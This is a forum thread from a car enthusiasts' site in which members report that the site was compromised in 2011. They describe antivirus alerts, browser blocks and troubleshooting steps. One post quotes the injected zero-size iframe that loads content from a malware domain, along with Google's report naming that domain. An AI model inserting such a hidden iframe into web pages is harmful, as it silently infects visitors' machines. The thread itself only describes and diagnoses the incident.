1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Is ASN ill?? Virus???

Ads Mar 7, 2011

  1. Ads

    Ads License to drive

    8,230
    612
    113
    Has this site got a virus or something?

    My antivirus (Sophos) has all of a sudden started blocking access to the forum, giving "Mal/frame-v" as the reason.
    Also noticed that the post message fields have all gone funny. i.e. they are squashed to such an extent that I can't type in them.

    Anyone else experiencing problems, or is it just my problem??

    PS: I'm having to post this using my iPhone.
     
  2. aragorn

    aragorn "Stick a V8 in it!" Staff Member Moderator VCDS Map User

    18,578
    868
    113
    yeh theres some dodgy iframe in the source code at the top of each page

    I've blocked it with Adblock Plus for now.
     
  3. Broken Byzan

    Broken Byzan Photographic Moderator Staff Member Moderator VCDS Map User quattro Audi A4

    13,237
    465
    83
    Admin on it, not sure what yet, it has come at the same time as a java update, so who knows. Blocked on ABP for now.

    Possible site will go down for cleansing if it's poorly though, so be aware
     
  4. MUSH

    MUSH MUSH Developments Ltd.

    713
    12
    18
    yep its hit me too, just had to run anti malware to remedy it...
     
  5. Ads

    Ads License to drive

    8,230
    612
    113
    Ah ok, thought it might have been just me, our network had a bit of a close shave with a virus the other day. Cheers guys.
     
  6. jojo

    jojo Looking for Boost! Staff Member Moderator Team Daytona Audi S3 quattro Audi A6 Audi Avant Owner Group

    28,991
    3,637
    113
    OK, what did I miss?
     
  7. NHN

    NHN Retrofitter - Audi - VW - Skoda - Seat Site Sponsor VCDS Map User

    29,561
    1,778
    113
    Jave code injection would appear, so when we access site, would of potentially added code to local machine if not secured, luckily I was.
     
  8. Sarah's A3

    Sarah's A3 MODERATOR V6 S3 Hybrid Moderator

    5,920
    30
    38
    Sadly the java got our laptop last weekend, got past all security too! Took days to sort! Glad ASNs sorted! Welcome back online!
     
  9. jojo

    jojo Looking for Boost! Staff Member Moderator Team Daytona Audi S3 quattro Audi A6 Audi Avant Owner Group

    28,991
    3,637
    113
    OK, so now I'm browsing this with the wonderful IE which is ***** basically.

    FF is coming up with the site attack warning, how do I reverse it? lol
     
  10. FranA3

    FranA3 FMDETAILING Site Sponsor Regional Rep Gold Supporter Team Brill Red Audi A3

    7,262
    358
    83
    mine was too i had to play around with the security settings to get back on asn
     
  11. slepy

    slepy Extremely smart and handsome person. VCDS Map User

    2,116
    356
    83
    Yeap, I'm getting the same with FF

    What happened when Google visited this site?
    Of the 69 pages that we tested on the site over the past 90 days, 51 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2011-03-07, and the last time that suspicious content was found on this site was on 2011-03-07.Malicious software includes 53 exploit(s), 16 trojan(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
    Malicious software is hosted on 1 domain(s), including ajkqqw.co.cc/.
    This site was hosted on 2 network(s) including AS21396 (NETCONNEX), AS29606 (BORWOOD).

    Obviously IE works with no issues. Don't you just love Microsoft?:)
     
  12. TAPNET

    TAPNET Member

    89
    5
    8
    ISn't it just a matter of removing the iframe code in the header template in vb? or does it come back?
     
  13. aragorn

    aragorn "Stick a V8 in it!" Staff Member Moderator VCDS Map User

    18,578
    868
    113
    ASN is back, but the iframe code is still there...
     
  14. ScottD3

    ScottD3 I want your faulty electronics Supporter Team V6 quattro Audi A8 Audi S8 Team Akoya saloon TDi

    15,164
    1,123
    113
    I can't use the site in work at all, I'm stuck using my phone.
    It's kind of better, I get to see all images now. Lol
     
  15. Westy

    Westy Well-Known Member

    17,443
    1,105
    113
    Every time I refresh a page on Firefox on my work PC it tries to open Windows Media Player and play a file. My McAfee then pops up to report a Trojan script! Doesn't happen on my home PC so I'm running a full scan now.
     
  16. mikeyg

    mikeyg Member

    835
    3
    16
    Can't get on at work just through my phone.
     
  17. S3RYE

    S3RYE Interior Next!!

    3,448
    70
    36
    Can't get on, on IE.

    Can get on, on MF but when on Mozilla I can't post?

    Only working on my iPhone!! Very annoying?!
     
  18. Ads

    Ads License to drive

    8,230
    612
    113
    For me the problems that were there before the site was taken down for repair are still there.

    1) Firefox - I can access the site and read all threads, but the 'reply to post text' fields are squashed and I can't type in them.
    2) Internet Explorer - Sophos is still blocking access, stating Mal/frame-V as the threat. If I turn off my antivirus then I can access but the screen formatting is poo and I keep getting prompted to download and install 'snapview.ocx' add on.
     
  19. cecilthesausage

    cecilthesausage ...It's Never Finished...

    933
    113
    18
    :banghead:I'm having the same problem done a full scan on comp... Hopefully this will remedy this, I can use on my iPhone but all forum threads are squashed up so you can't read the titles:banghead:
     
  20. jojo

    jojo Looking for Boost! Staff Member Moderator Team Daytona Audi S3 quattro Audi A6 Audi Avant Owner Group

    28,991
    3,637
    113
    Well, I can do that too, but it doesn't remove the problem, just reduces the security of your browser!

    So if anyone can do a quick 'how to' on how to revers the problem? I'm only using AVG on my works laptop, so it got attacked, I never surf any dodgy site with that laptop, so no point having a fancy anti virus software. My hope computer is fine though.
     
  21. TAPNET

    TAPNET Member

    89
    5
    8
  22. TAPNET

    TAPNET Member

    89
    5
    8
  23. S3RYE

    S3RYE Interior Next!!

    3,448
    70
    36
    Tapnet!! Bit of a problem mate!! Can't get on ASN on a comp to get the link!! How about you email it to us?
     
  24. ScottD3

    ScottD3 I want your faulty electronics Supporter Team V6 quattro Audi A8 Audi S8 Team Akoya saloon TDi

    15,164
    1,123
    113
    I can get on in work but have the same issue as aytheee.
    Can't even get on at home.
    Running malwarebytes.

    Go to download.com and search.
     
  25. TAPNET

    TAPNET Member

    89
    5
    8
    Search for MBAM on google its the top result :)
     
  26. S3RYE

    S3RYE Interior Next!!

    3,448
    70
    36
    Ok I found it on dl.com run a scan, no problems & still can't get on!
     
  27. ScottD3

    ScottD3 I want your faulty electronics Supporter Team V6 quattro Audi A8 Audi S8 Team Akoya saloon TDi

    15,164
    1,123
    113
    It's not us. It's the forum at fault.
    They need to fix the forum.
     
  28. S3RYE

    S3RYE Interior Next!!

    3,448
    70
    36
    Tell me bout it!! What I don't get is I can see people r posting!! Maybe they are all on there phones!!
     
  29. TAPNET

    TAPNET Member

    89
    5
    8
    I understood from jojo that he had actually been attacked by malware thats why I posted the links, running mbam wont remove the messages it removes infections.
     
  30. a9503128

    a9503128 Guest

    0
    0
    0
    Admin's the version of vBulletin are you using is "Powered by vBulletin™ Version 4.0.7" so its been updated but your data is still dirty..

    Bottom line you have been hacked as per the below video and the ""
    <iframesrc="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=default&sub=1"width="0"height="0"frameborder="0"></iframe>"" is still in your HTML



    Watch Hacking Vbulletin Forums (Ver 3.6.1) - Bad Text Online - VideoSurf Video Search
     
    Last edited by a moderator: Mar 8, 2011
  31. Dane

    Dane Had an 8L S3, a B5 RS4 now I have a B8 S4

    4,086
    182
    63
  32. moag

    moag she's no d-turbo

    821
    35
    28
    i get a warning message every time i try to a ASN page on safari, any suggestions to fix this?
     
  33. ScottD3

    ScottD3 I want your faulty electronics Supporter Team V6 quattro Audi A8 Audi S8 Team Akoya saloon TDi

    15,164
    1,123
    113
    It appears to be back to normal on every PC and laptop I use.

    Well done to the people who go it working again.
    Thanks. :)
     
  34. DJ_Troopa

    DJ_Troopa K1 Driver

    1,743
    15
    38
    Quick, somebody get ASN on Vag-Com!
     
  35. DaveA3

    DaveA3 Audi A-Trizzle!

    2,370
    15
    38
    lol this site is now a reported site on firefox as it contains malicious software. That might kill public views. Anyone in firefox will know what i mean
     
  36. Ads

    Ads License to drive

    8,230
    612
    113
    Still having problems here. Firefox is still blocking the site, and my AV is still detecting virus/spyware when accessing via IE.
     
  37. jcs356

    jcs356 Brum brum

    2,734
    70
    48
    Yep, Chrome is still blocking the site as well. I've had to resort back to IE to post this.
     
  38. ScottD3

    ScottD3 I want your faulty electronics Supporter Team V6 quattro Audi A8 Audi S8 Team Akoya saloon TDi

    15,164
    1,123
    113
    ******.
    Just me then.

    The error in firefox is from block site list that firefox uses.
    I dont think firefox checks each site you visit.
    It can be a bit miss leading.
     
  39. will89

    will89 Member

    357
    0
    16
    Safari on my mac still blocks it!
     
  40. Andy Crooks

    Andy Crooks Well-Known Member

    1,443
    144
    63
    i reported it to admin, then found this thread haha
     

Share This Page